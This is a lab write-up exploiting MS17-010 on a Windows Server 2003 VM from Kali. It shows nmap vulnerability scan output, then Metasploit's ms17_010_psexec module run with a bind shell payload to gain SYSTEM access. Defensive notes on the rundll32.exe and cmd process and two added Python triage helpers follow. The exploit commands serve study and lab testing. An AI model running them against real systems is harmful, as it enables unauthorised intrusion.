Testing Windows 2003 with msf on Kali

Test environment:

Windows 2003: 192.168.145.132

Kali: 192.168.145.146

Use Kali to find the ports open on Windows 2003 and check whether the services on those ports have known vulnerabilities:

nmap --script=vuln 192.168.145.132

root@kali:~# nmap --script=vuln 192.168.145.132
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-01 23:26 EDT
Nmap scan report for bogon (192.168.145.132)
Host is up (0.0033s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
|_sslv2-drown:
80/tcp   open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_  /robots.txt: Robots file
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1027/tcp open  IIS
MAC Address: 00:0C:29:3E:BE:DF (VMware)

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 150.89 seconds

As the host script results show, the MS08-067 and MS17-010 vulnerabilities are both present.

MS17-010 is used as the example below.

Start msf and obtain access to the remote host: msfconsole
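When triaging scan results like the ones above, a defender wants the VULNERABLE findings, their CVE ids and references pulled out of the script blocks rather than read by eye. The parser below is an added example and not part of the original post; it handles the nmap --script=vuln text format shown above and uses a constructed excerpt of that output as its input.

```python
import re
# Constructed sample: an excerpt of the "Host script results" section of the
# nmap --script=vuln output shown above for 192.168.145.132.
SAMPLE = """\
| smb-vuln-ms08-067:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     References:
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
"""
# A script header is "|" plus one space or "_" followed directly by the script
# name; detail lines under it are indented by several spaces and do not match.
HEADER_RE = re.compile(r"^\|[ _]([\w-]+):\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")

def parse_vuln_scripts(text):
    """Map each NSE script name to its state, CVE ids, risk factor and references."""
    results, current = {}, None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:  # new script result; a one-line result keeps its text as the state
            current = {"state": m.group(2) or None, "cves": [], "risk": None, "refs": []}
            results[m.group(1)] = current
            continue
        if current is None or not line.startswith("|"):
            continue
        body = line.lstrip("|_").strip()
        if body.startswith("State:"):
            current["state"] = body.split(":", 1)[1].strip()
        elif body.startswith("Risk factor:"):
            current["risk"] = body.split(":", 1)[1].strip()
        elif body.startswith("http"):
            current["refs"].append(body)
        for cve in CVE_RE.findall(body):  # from the IDs line and reference URLs
            if cve not in current["cves"]:
                current["cves"].append(cve)
    return results

def vulnerable(results):
    """Script names that reported State: VULNERABLE, as a sorted triage list."""
    return sorted(n for n, r in results.items() if r["state"] == "VULNERABLE")
```

Scripts that reported a negative or error result (false, NT_STATUS_...) keep that text as their state, so they are excluded from the triage list without being lost.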

msf5 > search ms17-010

Matching Modules
================

   Name                                           Disclosure Date  Rank     Check  Description
   ----                                           ---------------  ----     -----  -----------
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

msf5 > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.145.132
rhosts => 192.168.145.132
msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] 192.168.145.132:445 - Target OS: Windows Server 2003 3790 Service Pack 2
[*] 192.168.145.132:445 - Filling barrel with fish... done
[*] 192.168.145.132:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.145.132:445 -     [*] Preparing dynamite...
[*] 192.168.145.132:445 -         Trying stick 1 (x64)...Miss
[*] 192.168.145.132:445 -         [*] Trying stick 2 (x86)...Boom!
[*] 192.168.145.132:445 -     [+] Successfully Leaked Transaction!
[*] 192.168.145.132:445 -     [+] Successfully caught Fish-in-a-barrel
[*] 192.168.145.132:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.145.132:445 - Reading from CONNECTION struct at: 0x87107010
[*] 192.168.145.132:445 - Built a write-what-where primitive...
[+] 192.168.145.132:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.145.132:445 - Selecting native target
[*] 192.168.145.132:445 - Uploading payload... PAPySZMA.exe
[*] 192.168.145.132:445 - Created \PAPySZMA.exe...
[+] 192.168.145.132:445 - Service started successfully...
[*] 192.168.145.132:445 - Deleting \PAPySZMA.exe...
[*] Started bind TCP handler against 192.168.145.132:4444
[*] Command shell session 1 opened (192.168.145.146:40349 -> 192.168.145.132:4444) at 2019-07-02 02:56:09 -0400


C:\WINDOWS\system32>
C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter ��������:

   Connection-specific DNS Suffix  . : localdomain
   IP Address. . . . . . . . . . . . : 192.168.145.132
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.145.2

Check the network connections on Windows 2003 and locate the connection record.

Add a login user: the addition succeeds, but the system keeps no record of it anywhere.

An anonymous logon appears under Security.

Look up the process: it is rundll32.exe, a Microsoft binary that can execute code contained in DLL files. Because this utility is part of the Windows operating system, it can be used as a way to bypass AppLocker rules or Software Restriction Policies. So if certain settings in the system environment are not locked down properly, a user can use this binary to do things, and can also write their own DLL to bypass any restrictions or execute malicious JavaScript code:

Kill the process directly.

The program on Kali can still run.

Check the network connection status again: the PID is unchanged, but the process can no longer be found.

In Event Viewer, nothing abnormal appears under Security; under System an anomaly is found: status messages from the Performance Logs and Alerts service.

Restart Windows 2003; the Kali session exits.

Install the process viewer procexp on Windows 2003 and watch the programs: when Kali runs the program, a rundll32.exe process and a cmd child process appear automatically. If only rundll32.exe is killed, commands can still be executed; only when the child process is killed together with it does the remote-control program exit.
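The procexp observation above, that killing rundll32.exe alone leaves its cmd child running, is easy to reproduce on a process snapshot. The code below is an added example and not from the original post: it uses constructed (pid, ppid, name) rows with made-up PIDs, computes the whole tree that has to be ended, and lists the orphans left behind when only the parent is killed.

```python
# Constructed process snapshot (pid, ppid, name) modelled on what procexp showed
# above: rundll32.exe started by services.exe, with a cmd.exe child. PIDs are
# made up for this example.
BEFORE_KILL = [
    (4, 0, "System"),
    (408, 4, "smss.exe"),
    (620, 408, "services.exe"),
    (1322, 620, "svchost.exe"),
    (1844, 620, "rundll32.exe"),
    (1900, 1844, "cmd.exe"),
]
# Snapshot after only rundll32.exe (pid 1844) was killed: cmd.exe keeps running
# and still reports its dead parent's pid.
AFTER_KILL = [row for row in BEFORE_KILL if row[0] != 1844]

def descendants(snapshot, root_pid):
    """All pids below root_pid, so the whole tree can be ended, not only the parent."""
    children = {}
    for pid, ppid, _ in snapshot:
        children.setdefault(ppid, []).append(pid)
    found, stack = [], [root_pid]
    while stack:
        for child in children.get(stack.pop(), []):
            found.append(child)
            stack.append(child)
    return sorted(found)

def kill_set(snapshot, name):
    """Pids to terminate for every process called `name` plus everything under it."""
    roots = [pid for pid, _, n in snapshot if n.lower() == name.lower()]
    return sorted(set(roots) | {d for r in roots for d in descendants(snapshot, r)})

def orphans(snapshot):
    """Processes whose parent no longer exists: what is left after killing only the parent."""
    alive = {pid for pid, _, _ in snapshot}
    return sorted((pid, name) for pid, ppid, name in snapshot
                  if ppid != 0 and ppid not in alive)
```

A real snapshot can be taken from procexp, tasklist or WMI; the same two checks then tell a responder whether the tree was fully removed.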

Reference link: https://blog.csdn.net/wy_97/article/details/86665566
